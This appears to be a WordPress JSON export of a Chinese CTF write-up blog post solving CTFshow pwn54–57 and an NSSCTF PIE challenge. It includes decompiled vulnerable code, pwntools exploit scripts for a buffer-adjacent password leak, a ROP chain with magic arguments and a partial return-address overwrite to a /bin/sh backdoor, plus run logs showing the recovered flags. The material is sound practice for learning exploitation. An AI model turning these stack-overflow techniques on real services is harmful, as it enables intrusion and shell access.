32\u4f4d\u7a0b\u5e8f<\/p>\n\n\n\n
\u5206\u6790\u4e3b\u51fd\u6570<\/p>\n\n\n\n
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s1[64]; \/\/ [esp+0h] [ebp-1A0h] BYREF
char v5[256]; \/\/ [esp+40h] [ebp-160h] BYREF
char s[64]; \/\/ [esp+140h] [ebp-60h] BYREF
FILE *stream; \/\/ [esp+180h] [ebp-20h]
char *v8; \/\/ [esp+184h] [ebp-1Ch]
int *p_argc; \/\/ [esp+194h] [ebp-Ch]
\u200b
p_argc = &argc;
setvbuf(stdout, 0, 2, 0);
memset(s, 0, sizeof(s));
memset(v5, 0, sizeof(v5));
memset(s1, 0, sizeof(s1));
puts(\"==========CTFshow-LOGIN==========\");
puts(\"Input your Username:\");
fgets(v5, 256, stdin);
v8 = strchr(v5, 10);
if ( v8 )
*v8 = 0;
strcat(v5, \",\\nInput your Password.\");
stream = fopen(\"\/password.txt\", \"r\");
if ( !stream )
{
puts(\"\/password.txt: No such file or directory.\");
exit(0);
}
fgets(s, 64, stream);
printf(\"Welcome \");
puts(v5);
fgets(s1, 64, stdin);
v5[0] = 0;
if ( !strcmp(s1, s) )
{
puts(\"Welcome! Here's what you want:\");
flag();
}
else
{
puts(\"You has been banned!\");
}
return 0;
}<\/code><\/pre>\n\n\n\n\u7b80\u5355\u5206\u6790\u51fd\u6570\u903b\u8f91<\/p>\n\n\n\n
\u4ea4\u4e92\u6548\u679c\u5c31\u662f\u7528\u6237\u9996\u5148\u8f93\u5165username<\/strong>\uff0cusername<\/strong>\u4f9d\u9760fgets<\/strong>\u51fd\u6570\u83b7\u53d6\uff0cfgets<\/strong>\u51fd\u6570\u7684\u597d\u5904\u5c31\u5728\u4e8e\u4f1a\u9650\u5236\u8bfb\u53d6\u5b57\u8282\u6570\uff0c\u907f\u514d\u4e86\u666e\u901agets<\/strong>\u51fd\u6570\u5b58\u5728\u7684\u6808\u6ea2\u51fa\u98ce\u9669<\/p>\n\n\n\n\u4f46\u662f\u8fd9\u91ccusername<\/strong>\u7684\u50a8\u5b58\u957f\u5ea6\u8bbe\u7f6e\u4e3a256\u5b57\u8282\uff0c\u5e76\u5c06\u5176\u5b58\u50a8\u4e8e\u53d8\u91cfV5<\/strong><\/p>\n\n\n\n\u7136\u540e\u7acb\u9a6c\u63a5\u4e86\u4e00\u4e2aputs<\/strong>\u51fd\u6570<\/p>\n\n\n\nputs<\/strong>\u51fd\u6570\u7684\u7279\u6027\u5c31\u662f\u5728\/x00\u4e4b\u524d\u4e0d\u4f1a\u505c\u6b62\u8f93\u51fa<\/p>\n\n\n\n\u8fd9\u91cc\u5c31\u548c\u524d\u9762\u7684\u53d8\u91cfV5<\/strong>\u6709\u4e86\u4e00\u5b9a\u5173\u8054<\/p>\n\n\n\n\u53d8\u91cfV5<\/strong>\u5b58\u50a8\u7684\u4f4d\u7f6e\u4e3a\uff1a0x0000000000000160<\/p>\n\n\n\n\u800c\u540e\u7eed\u7684\u5bc6\u7801\u5b58\u50a8\u4e8e\u53d8\u91cfs<\/strong><\/p>\n\n\n\n\u800cs<\/strong>\u7684\u4f4d\u7f6e\u662f\uff1a0x0000000000000060<\/p>\n\n\n\n\u4e8c\u8005\u521a\u597d\u76f8\u5dee0x100<\/strong><\/p>\n\n\n\n\u800c\u8fd9\u521a\u597d\u5c31\u662f256\u5b57\u8282<\/p>\n\n\n\n
\u6240\u4ee5\u4e00\u65e6\u5728\u8f93\u5165\u4e00\u4e2a\u957f\u5ea6\u4e3a256\u5b57\u8282\u7684username\u540e\uff0cputs\u51fd\u6570\u4f1a\u8f93\u51fa\u4e00\u4e2awelcome\u540e\u63a5\u4e0a\u521a\u521a\u7684username\uff0c\u4f46\u5982\u679cusername\u91cc\u9762\u6ca1\u7a7a\u683c\u7b26\u548c\u6362\u884c\u7b26\u7684\u8bdd\uff0cputs<\/strong>\u51fd\u6570\u5c06\u6309\u7167\u4f4d\u7f6e\u7ee7\u7eed\u8f93\u51fa\uff0c\u800c256\u5b57\u8282\u540e\uff0c\u521a\u597d\u5c31\u662f\u5bc6\u7801\u6240\u5728\u7684\u5b57\u6bb5<\/p>\n\n\n\n\u6240\u4ee5\u5f53\u8f93\u5165\u4e00\u4e2a\u957f\u5ea6\u4e3a256\u5b57\u8282\u7684username\u65f6\uff0c\u5b83\u7684\u6b22\u8fce\u5185\u5bb9\u4f1a\u5728\u540e\u9762\u591a\u8ddf\u4e00\u6bb5\u5bc6\u7801<\/p>\n\n\n\n
\u90a3\u4e48exp\u5c31\u5f88\u660e\u663e\u4e86<\/p>\n\n\n\n
from pwn import *
p=remote(\"pwn.challenge.ctf.show\",28141)
payload = b'a'*256
p.sendline(payload)
p.interactive()<\/code><\/pre>\n\n\n\n\u4ea4\u4e92\u7ed3\u679c\uff1a<\/p>\n\n\n\n
D:\\python\\pythonProject\\.venv\\Scripts\\python.exe D:\\python\\pythonProject\\pwn54.py
[x] Opening connection to pwn.challenge.ctf.show on port 28141
[x] Opening connection to pwn.challenge.ctf.show on port 28141: Trying 124.223.158.81
[+] Opening connection to pwn.challenge.ctf.show on port 28141: Done
[*] Switching to interactive mode
==========CTFshow-LOGIN==========
Input your Username:
Welcome aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa,CTFshow_PWN_r00t_p@ssw0rd_1s_h3r3
\u200b
You has been banned!
[*] Got EOF while reading in interactive<\/code><\/pre>\n\n\n\n\u8fd9\u91cc\u7684CTFshow_PWN_r00t_p@ssw0rd_1s_h3r3\u5c31\u662f\u6700\u7ec8\u7684\u7528\u6237\u5bc6\u7801<\/p>\n\n\n\n
\u4e8e\u662f\u518d\u4e00\u6b21\u8fdb\u884c\u4ea4\u4e92<\/p>\n\n\n\n
C:\\Users\\26597>nc pwn.challenge.ctf.show 28141
==========CTFshow-LOGIN==========
Input your Username:
a
Welcome a,
Input your Password.
CTFshow_PWN_r00t_p@ssw0rd_1s_h3r3
Welcome! Here's what you want:
ctfshow{cf69bbb6-bc1f-48d4-9a0f-d9595a477f27}<\/code><\/pre>\n\n\n\npwn55<\/h2>\n\n\n\n
checksec<\/p>\n\n\n\n
32\u4f4d<\/p>\n\n\n\n
[*] 'C:\\\\Users\\\\26597\\\\Desktop\\\\pwn\u9644\u4ef6\\\\pwn55'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Stripped: No<\/code><\/pre>\n\n\n\nIDA\u5206\u6790<\/p>\n\n\n\n
\u4e3b\u51fd\u6570\u6ca1\u4e1c\u897f<\/p>\n\n\n\n
\u8fdbctfshow\u51fd\u6570<\/p>\n\n\n\n
\u91cc\u9762\u8fd8\u662f\u6ca1\u5565\u4e1c\u897f<\/p>\n\n\n\n
\u5c31\u660e\u6446\u7740\u4e00\u4e2agets<\/strong>\u51fd\u6570\u6808\u6ea2\u51fa<\/p>\n\n\n\n\u770b\u51fd\u6570\u5217\u8868<\/p>\n\n\n\n
\u5b58\u5728\u51e0\u4e2a\u5f88\u660e\u663e\u63d0\u793a\u7684\u51fd\u6570<\/p>\n\n\n\n
flag_func1,flag_func2,flag<\/strong>\u4e09\u4e2a\u51fd\u6570<\/p>\n\n\n\n\u4e00\u4e00\u67e5\u770b<\/p>\n\n\n\n
flag_func1<\/strong>\uff1a<\/p>\n\n\n\nElf32_Dyn **flag_func1()
{
Elf32_Dyn **result; \/\/ eax
\u200b
result = &GLOBAL_OFFSET_TABLE_;
flag1 = 1;
return result;
}<\/code><\/pre>\n\n\n\nflag_func2<\/strong>\uff1a<\/p>\n\n\n\nElf32_Dyn **__cdecl flag_func2(int a1)
{
Elf32_Dyn **result; \/\/ eax
\u200b
result = &GLOBAL_OFFSET_TABLE_;
if ( flag1 && a1 == -1397969748 )
{
flag2 = 1;
}
else if ( flag1 )
{
return (Elf32_Dyn **)puts(\"Try Again.\");
}
else
{
return (Elf32_Dyn **)puts(\"Try a little bit.\");
}
return result;
}<\/code><\/pre>\n\n\n\nflag<\/strong>:<\/p>\n\n\n\nint __cdecl flag(int a1)
{
char s[48]; \/\/ [esp+Ch] [ebp-3Ch] BYREF
FILE *stream; \/\/ [esp+3Ch] [ebp-Ch]
\u200b
stream = fopen(\"\/ctfshow_flag\", \"r\");
if ( !stream )
{
puts(\"\/ctfshow_flag: No such file or directory.\");
exit(0);
}
fgets(s, 48, stream);
if ( flag1 && flag2 && a1 == -1111638595 )
return printf(\"%s\", s);
if ( flag1 && flag2 )
return puts(\"Incorrect Argument.\");
if ( flag1 || flag2 )
return puts(\"Nice Try!\");
return puts(\"Flag is not here!\");
}<\/code><\/pre>\n\n\n\n\u521d\u7565\u5ba1\u8ba1\uff0c\u5927\u610f\u5c31\u662ffunc1\u8c03\u7528\uff0cflag1\u5c31\u7b49\u4e8e1\u4e86\uff0c\u4e5f\u5c31\u4e3a\u771f\u4e86<\/p>\n\n\n\n
\u8c03\u7528func2\uff0c\u6b64\u65f6\u4f1a\u68c0\u67e5flag1\u662f\u5426\u4e3a\u771f\uff0c\u5e76\u68c0\u67e5a1\u662f\u5426\u4e3a\u5bf9\u5e94\u503c<\/p>\n\n\n\n
\u8c03\u7528flag\uff0c\u6b64\u65f6\u4f1a\u68c0\u67e5flag1\uff0cflag2\u662f\u5426\u4e3a\u771f\uff0c\u5e76\u68c0\u67e5a1\u662f\u5426\u4e3a\u5bf9\u5e94\u503c<\/p>\n\n\n\n
\u521d\u7565\u7406\u89e3\u81f3\u6b64\u5373\u53ef<\/p>\n\n\n\n
\u8bb0\u5f55\u4e09\u51fd\u6570\u5730\u5740\uff0c\u6253\u5e73\u5b57\u8282<\/p>\n\n\n\n
payload = flat([b'a'*(0x2c+4),flag1,flag2,flag,-1397969748,-1111638595])<\/code><\/pre>\n\n\n\n\u5b8c\u6574exp\uff1a<\/p>\n\n\n\n
from pwn import *\np = remote(\"pwn.challenge.ctf.show\",28301)\nflag1 = 0x08048586\nflag2 = 0x0804859D\nflag = 0x08048606\npayload = flat([b'a'*(0x2c+4),flag1,flag2,flag,-1397969748,-1111638595])\np.sendline(payload)\np.interactive()<\/code><\/pre>\n\n\n\nD:\\python\\pythonProject\\.venv\\Scripts\\python.exe D:\\python\\pythonProject\\pwn55.py
[x] Opening connection to pwn.challenge.ctf.show on port 28301
[x] Opening connection to pwn.challenge.ctf.show on port 28301: Trying 124.223.158.81
[+] Opening connection to pwn.challenge.ctf.show on port 28301: Done
[*] Switching to interactive mode
\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584
\u2588\u2588\u2580\u2580\u2580\u2580\u2588 \u2580\u2580\u2580\u2588\u2588\u2580\u2580\u2580 \u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580 \u2588\u2588
\u2588\u2588\u2580 \u2588\u2588 \u2588\u2588 \u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584 \u2588\u2588\u2584\u2588\u2588\u2588\u2588\u2584 \u2584\u2588\u2588\u2588\u2588\u2584 \u2588\u2588 \u2588\u2588
\u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2584\u2584\u2584\u2584 \u2580 \u2588\u2588\u2580 \u2588\u2588 \u2588\u2588\u2580 \u2580\u2588\u2588 \u2580\u2588 \u2588\u2588 \u2588\u2580
\u2588\u2588\u2584 \u2588\u2588 \u2588\u2588 \u2580\u2580\u2580\u2580\u2588\u2588\u2584 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2588
\u2588\u2588\u2584\u2584\u2584\u2584\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2580\u2588\u2588\u2584\u2584\u2588\u2588\u2580 \u2580\u2588\u2588 \u2588\u2588\u2580
\u2580\u2580\u2580\u2580 \u2580\u2580 \u2580\u2580 \u2580\u2580\u2580\u2580\u2580\u2580 \u2580\u2580 \u2580\u2580 \u2580\u2580\u2580\u2580 \u2580\u2580 \u2580\u2580
* *************************************
* Classify: CTFshow --- PWN --- \u5165\u95e8
* Type : Stack_Overflow
* Site : https:\/\/ctf.show\/
* Hint : Try to find the relationship between flags!
* *************************************
How to find flag?
Input your flag: ctfshow{3a9e5798-5ee2-4802-909d-42fb5ab55206}
[*] Got EOF while reading in interactive<\/code><\/pre>\n\n\n\npwn56<\/h2>\n\n\n\n[*] 'C:\\\\Users\\\\26597\\\\Desktop\\\\pwn\u9644\u4ef6\\\\pwn56'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
Stripped: No<\/code><\/pre>\n\n\n\nIDA\u5206\u6790<\/p>\n\n\n\n
\u5c31\u4e00\u4e2a\u51fd\u6570<\/p>\n\n\n\n
void __noreturn start()
{
int v0; \/\/ eax
char v1[10]; \/\/ [esp-Ch] [ebp-Ch] BYREF
__int16 v2; \/\/ [esp-2h] [ebp-2h]
\u200b
v2 = 0;
strcpy(v1, \"\/bin\/\/\/sh\");
v0 = sys_execve(v1, 0, 0);
}<\/pre>\n\n\n\nshellcode\u8bf4\u662f<\/p>\n\n\n\n
\u5b9e\u9645\u4e0ashell\u76f4\u63a5\u5c31\u7ed9\u4e86<\/p>\n\n\n\n
\u8fde\u4e0a\u5c31\u9001\u4e86\u5c5e\u4e8e\u662f<\/p>\n\n\n\n
pwn57<\/h2>\n\n\n\n
\u540c\u4e0a\uff0c\u8fde\u4e0a\u5c31\u9001\uff0c\u8fd9\u4e24\u9898\u7684\u4e3b\u8981\u76ee\u7684\u8fd8\u662f\u8ba4\u8bc6shellcode<\/p>\n\n\n\n
Welcome come to the world of PWN<\/h2>\n\n\n\n
\u8fd9\u9898\u53ef\u4ee5\u548cACECTF\u4e2d\u7684PIE\u8fdb\u884c\u8054\u52a8<\/p>\n\n\n\n
ACECTF\u4e2d\u7684\u5c31\u662f\u4e00\u4e2a\u5148\u5bfc\u9898<\/p>\n\n\n\n
\u5f88\u9057\u61be\u6ca1\u80fd\u7b2c\u4e00\u65f6\u95f4\u610f\u8bc6\u5230\u8fd9\u4fe9\u5b9e\u9645\u4e0a\u662f\u4e00\u4e2a\u8003\u70b9<\/p>\n\n\n\n
checksec<\/p>\n\n\n\n
[*] 'C:\\\\Users\\\\26597\\\\Desktop\\\\pwn\u9644\u4ef6\\\\GHpwn1'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
Stripped: No<\/code><\/pre>\n\n\n\nIDA\u6253\u5f00<\/p>\n\n\n\n
\u53cd\u7f16\u8bd1\u7ed3\u679c\u5f88\u660e\u663e<\/p>\n\n\n\n
main\u51fd\u6570\u5c31\u6267\u884c\u4e24\u4e2a\u4e3b\u8981\u51fd\u6570<\/p>\n\n\n\n
\u8f93\u51fa\u51fd\u6570\u6ca1\u4ec0\u4e48\u597d\u8bf4\u7684<\/p>\n\n\n\n
\u5168\u662fput\u8f93\u51fa<\/p>\n\n\n\n
func1\u51fd\u6570\u91cc\u9762\u5b58\u5728\u5f88\u660e\u663e\u7684\u6808\u6ea2\u51fa\u6f0f\u6d1e<\/p>\n\n\n\n
ssize_t func1()
{
_BYTE buf[32]; \/\/ [rsp+0h] [rbp-20h] BYREF
\u200b
return read(0, buf, 0x40uLL);
}<\/code><\/pre>\n\n\n\n\u5f88\u7b80\u5355\u7684\u6808\u6ea2\u51fa<\/p>\n\n\n\n
\u770b\u51fd\u6570\u8fd8\u80fd\u53d1\u73b0\u5b58\u5728backdoor\u51fd\u6570<\/p>\n\n\n\n
\u76f4\u63a5\u7ed9\u4e86<\/p>\n\n\n\n
int backdoor()
{
return system(\"\/bin\/sh\");
}<\/code><\/pre>\n\n\n\n\u5f88\u660e\u663e\u4e86<\/p>\n\n\n\n
\u4e00\u822c\u60c5\u51b5\u5c31\u662f\u6ea2\u51fa\u5b57\u7b26\u52a0\u540e\u95e8\u51fd\u6570\u5730\u5740\u5c31\u597d\u4e86<\/p>\n\n\n\n
\u4f46\u662f\u5b58\u5728PIE\u4fdd\u62a4<\/p>\n\n\n\n
PIE\u4fdd\u62a4\u7684\u6548\u679c\u662f\u4ec0\u4e48<\/p>\n\n\n\n
\u53c2\u8003ACECTF\u4e2dPIE\u9898\u76ee<\/p>\n\n\n\n
PIE\u7684\u5b58\u5728\u8ba9\u6211\u4eec\u62ff\u4e0d\u5230\u8fdc\u7a0b\u4ea4\u4e92\u7684\u51fd\u6570\u5b9e\u9645\u5730\u5740\uff0c\u5c31\u6ca1\u6cd5\u5b8c\u6210\u63d0\u6743\u64cd\u4f5c<\/p>\n\n\n\n
\u800c\u5185\u5b58\u5206\u9875\u673a\u5236\u5b58\u5728\u95ee\u9898\uff1a\u7a0b\u5e8f\u5730\u5740\u6700\u540e 3<\/code> \u4e2a 16<\/code> \u8fdb\u5236\u4f4d\u662f\u4e0d\u4f1a\u6539\u53d8\u7684<\/p>\n\n\n\n\u8fd9\u4e2a\u5730\u65b9\u53ef\u53c2\u8003ACECTF\uff0cACECTF\u5bf9\u6b64\u505a\u4e86\u5f88\u4e0d\u9519\u7684\u5f15\u5bfc<\/p>\n\n\n\n
\u90a3\u5012\u56de\u6b64\u5904<\/p>\n\n\n\n
\u6ea2\u51fa\u62ff\u5230<\/p>\n\n\n\n
\u5df2\u77e5\u56e0\u4e3a\u5185\u5b58\u5206\u9875\u673a\u5236\uff0c\u7a0b\u5e8f\u5730\u5740\u540e\u4e09\u4f4d\u4e0d\u53d8<\/p>\n\n\n\n
\u800c\u5173\u952e\u7684backdoor\u51fd\u6570\u5730\u5740<\/p>\n\n\n\n
.text:00000000000009C1 ; int backdoor()
.text:00000000000009C1 public backdoor
.text:00000000000009C1 backdoor proc near
.text:00000000000009C1 ; __unwind {
.text:00000000000009C1 push rbp
.text:00000000000009C2 mov rbp, rsp
.text:00000000000009C5 lea rdi, command ; \"\/bin\/sh\"
.text:00000000000009CC call _system
.text:00000000000009D1 nop
.text:00000000000009D2 pop rbp
.text:00000000000009D3 retn
.text:00000000000009D3 ; } \/\/ starts at 9C1
.text:00000000000009D3 backdoor endp<\/code><\/pre>\n\n\n\n\u4e3a\u4e86\u80fd\u591f\u4f7f\u7528p8\u65b9\u6cd5\uff0c\u6211\u4eec\u91c7\u7528\u540e\u4e24\u4f4d\uff0c\u82e5\u91c7\u7528\u540e\u4e09\u4f4d\u5219\u4f1a\u4f7fp8\u65b9\u6cd5\u62a5\u9519<\/p>\n\n\n\n
\u4e0d\u77e5\u9053\u662f\u4e0d\u662fPIE\u90fd\u9ed8\u8ba4\u4f7f\u7528p8\u65b9\u6cd5\uff0c\u65e5\u540e\u518d\u8fdb\u884c\u9a8c\u8bc1<\/p>\n\n\n\n
exp\uff1a<\/p>\n\n\n\n
from pwn import *
p = remote('node6.anna.nssctf.cn',22606)
payload = b'a'*0x28 + p8(0xC5)
p.send(payload)
p.interactive()<\/code><\/pre>\n\n\n\n<\/p>\n","protected":false},"excerpt":{"rendered":"
pwn54 32\u4f4d\u7a0b\u5e8f \u5206\u6790\u4e3b\u51fd\u6570 \u7b80\u5355\u5206\u6790\u51fd\u6570\u903b\u8f91 \u4ea4\u4e92\u6548\u679c\u5c31\u662f\u7528\u6237\u9996\u5148\u8f93\u5165username\uff0cusernam […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-295","post","type-post","status-publish","format-standard","hentry","category-ctf"],"_links":{"self":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/295","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=295"}],"version-history":[{"count":0,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/295\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=295"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=295"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=295"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}